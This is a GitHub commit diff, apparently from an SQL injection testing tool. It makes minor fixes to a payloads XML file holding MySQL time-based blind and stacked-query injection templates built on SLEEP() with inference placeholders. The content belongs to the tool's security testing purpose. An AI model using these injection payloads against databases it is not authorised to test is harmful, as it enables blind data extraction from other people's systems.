Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 560bc7c

Browse files
committed
minor fixes
1 parent c51ecf3 commit 560bc7c

1 file changed

Lines changed: 4 additions & 4 deletions

File tree

xml/payloads/00_payloads.xml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1650,7 +1650,7 @@ Tag: <test>
16501650
<where>1</where>
16511651
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
16521652
<request>
1653-
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
1653+
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
16541654
</request>
16551655
<response>
16561656
<time>[SLEEPTIME]</time>
@@ -1663,7 +1663,7 @@ Tag: <test>
16631663

16641664
<test>
16651665
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
1666-
<stype>5</stype>
1666+
<stype>4</stype>
16671667
<level>4</level>
16681668
<risk>0</risk>
16691669
<clause>0</clause>
@@ -2929,7 +2929,7 @@ Tag: <test>
29292929

29302930
<!-- Time-based blind tests - Parameter replace -->
29312931
<test>
2932-
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
2932+
<title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT)</title>
29332933
<stype>5</stype>
29342934
<level>4</level>
29352935
<risk>1</risk>
@@ -2949,7 +2949,7 @@ Tag: <test>
29492949
</test>
29502950

29512951
<test>
2952-
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
2952+
<title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT - comment)</title>
29532953
<stype>5</stype>
29542954
<level>5</level>
29552955
<risk>1</risk>

0 commit comments

Comments
 (0)